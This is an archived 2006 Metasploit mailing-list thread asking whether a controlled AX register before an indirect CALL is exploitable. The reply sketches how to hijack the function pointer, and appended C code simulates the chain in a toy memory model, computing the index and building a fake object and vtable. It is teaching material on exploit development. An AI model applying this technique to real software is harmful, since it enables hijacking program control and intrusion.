Metasploit mailing list archives

exploitable???


From: arahzone-msf at yahoo.com (arahzone-msf at yahoo.com)
Date: Sat, 24 Jun 2006 16:02:20 -0700 (PDT)

Hi,
   
  Thanks for your help, this thing is really hard to exploit.

John Sprocket <sargoniv at gmail.com> wrote:
  whenever you look at something like this to see if it's exploitable
you can usually
see a dependency chain. to summarize. yes, it's exploitable.
would it be a pain in the ass? yea, prolly.
so your goal is to execute code of your choice via a function pointer.

let's be backwardz:
1B0114A3 FF52 10 CALL DWORD PTR DS:[EDX+10]
1B0114A1 8B11 MOV EDX,DWORD PTR DS:[ECX]
1B01149A 8B8C87 B0000000 MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B011497 0FBFC0 MOVSX EAX,AX

let's summarize whatcha got:
your goal == calling [edx+0x10].
edx depends on the value at [ecx]
ecx then depends on the value at [edi + eax*4 + 0xb0]
and you control some of eax.
our primary variable here is edi which probably gets allocated somewhere.

so at the poc [point-of-crash] your process, you're prolly gonna want
to know the state of your
regs, like mainly edi. see what address edi was allocated at. then add
0xb0 to it.
now at 0x1b0114a1, it gets dereferenced again. so, look around for a
location where eax
points to an address that points to code that you control. then
subtract 10 and you're good
to go.

after you got that down...then comes figuring out a way to make it
"reliable". that's the exciting^W"fun" part. :)

.sargoniv



skape's shit looks like it will rock btw.
http://metasploit.blogspot.com/2006/04/interprocedural-data-flow-dependencies.html#links




----pardon this archive paste---
Subject: [framework] exploitable???
From: 
Date: Thu, 22 Jun 2006 14:24:14 -0700 (PDT)
Reply-to: framework[at]metasploit.com

________________________________
Hi,

I am controlling AX in the code below but I don't know how to exploit
it. Is this exploitable?

1B011497 0FBFC0 MOVSX EAX,AX
1B01149A 8B8C87 B0000000 MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B0114A1 8B11 MOV EDX,DWORD PTR DS:[ECX]
1B0114A3 FF52 10 CALL DWORD PTR DS:[EDX+10]

Thanks in advance

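The dependency chain Sprocket walks backwards through can be played out on a toy address space. The following is an added example, not code from the thread or from anyone in it: it models a little 32-bit "process memory" as a byte array, emulates the four instructions from the original post, and shows the two steps of the recipe, choosing AX so that EDI+EAX*4+0xB0 lands on a dword you control, and laying out the fake object / fake vtable behind it so that CALL [EDX+0x10] ends up at an address of your choosing. The EDI value, the controlled-buffer address and the target address are constructed for the example. It also shows something the thread only hints at with "you control some of eax": because MOVSX sign-extends AX, values of 0x8000 and above give a negative index, so the reachable window runs about 32K dwords on either side of EDI+0xB0, not just forward.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy 32-bit "process memory" (constructed for this example): every address
 * below is an offset into mem[], so DWORD PTR reads behave like x86 ones. */
#define MEM_SIZE 0x20000u
static uint8_t mem[MEM_SIZE];

static int in_bounds(uint32_t addr, uint32_t len)
{
    return addr < MEM_SIZE && len <= MEM_SIZE - addr;
}

static uint32_t read32(uint32_t addr)
{
    uint32_t v;
    memcpy(&v, mem + addr, sizeof v);   /* little-endian DWORD PTR DS:[addr] */
    return v;
}

static void write32(uint32_t addr, uint32_t v)
{
    memcpy(mem + addr, &v, sizeof v);
}

/* Walk the chain from the thread:
 *   MOVSX EAX,AX
 *   MOV   ECX,DWORD PTR DS:[EDI+EAX*4+0B0h]
 *   MOV   EDX,DWORD PTR DS:[ECX]
 *   CALL  DWORD PTR DS:[EDX+10h]
 * Returns the address the CALL would transfer to, or 0 if one of the three
 * dereferences would fault (unmapped in the toy address space). */
static uint32_t resolve_call_target(uint32_t edi, uint16_t ax)
{
    int32_t  eax  = (int16_t)ax;                        /* sign-extended    */
    uint32_t slot = edi + (uint32_t)eax * 4u + 0xB0u;   /* 32-bit wraparound */
    if (!in_bounds(slot, 4)) return 0;
    uint32_t ecx = read32(slot);
    if (!in_bounds(ecx, 4)) return 0;
    uint32_t edx = read32(ecx);
    uint32_t fp  = edx + 0x10u;
    if (!in_bounds(fp, 4)) return 0;
    return read32(fp);
}

/* Step 1: given EDI at the crash and the address of the dword you want ECX
 * loaded from, compute the AX that gets there.  Returns -1 when the slot is
 * not 4-byte aligned relative to EDI+0xB0 or is outside the signed 16-bit
 * index window (about 128 KiB either side), otherwise the 16-bit AX value. */
static int pick_ax(uint32_t edi, uint32_t slot)
{
    int64_t delta = (int64_t)slot - (int64_t)edi - 0xB0;
    if (delta % 4 != 0) return -1;
    int64_t idx = delta / 4;
    if (idx < INT16_MIN || idx > INT16_MAX) return -1;
    return (uint16_t)(int16_t)idx;
}

/* Step 2: lay out a fake object in a buffer you control (hypothetical
 * address `buf`).  The dword at buf is what ECX is loaded from; it points at
 * a fake object whose first dword is a fake vtable; slot +0x10 of that
 * vtable is the final CALL target. */
static void build_fake_object(uint32_t buf, uint32_t target)
{
    write32(buf,               buf + 0x10);  /* [slot]     -> ECX = fake object */
    write32(buf + 0x10,        buf + 0x20);  /* [ECX]      -> EDX = fake vtable */
    write32(buf + 0x20 + 0x10, target);      /* [EDX+0x10] -> where CALL goes   */
}

/* End to end: the address the CALL lands on, or 0 if buf is unreachable from
 * this EDI or the chain faults. */
static uint32_t demo(uint32_t edi, uint32_t buf, uint32_t target)
{
    memset(mem, 0, sizeof mem);
    build_fake_object(buf, target);
    int ax = pick_ax(edi, buf);
    if (ax < 0) return 0;
    return resolve_call_target(edi, (uint16_t)ax);
}

int main(void)
{
    /* Positive index: EDI sits below the controlled buffer. */
    printf("edi=0x1000 buf=0x8000 -> ax=0x%04x, call -> 0x%08x\n",
           pick_ax(0x1000, 0x8000), (unsigned)demo(0x1000, 0x8000, 0x41414141u));
    /* Negative index (AX >= 0x8000): MOVSX lets you reach below EDI as well. */
    printf("edi=0x9000 buf=0x8000 -> ax=0x%04x, call -> 0x%08x\n",
           pick_ax(0x9000, 0x8000), (unsigned)demo(0x9000, 0x8000, 0x41414141u));
    /* Misaligned slot and a slot more than 32767 entries away: not reachable. */
    printf("misaligned: %d, too far: %d\n",
           pick_ax(0x1000, 0x8001), pick_ax(0x1000, 0x30000));
    return 0;
}
```

The two things to take from it: pick_ax is the "see what address edi was allocated at, then add 0xb0" step turned into arithmetic (with the alignment and range checks you would otherwise discover by crashing), and build_fake_object is the double dereference the second half of the recipe asks you to satisfy. On a real target the buffer address and EDI come from the debugger at the point of crash, and the "reliable" part is making both of them stable across runs.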

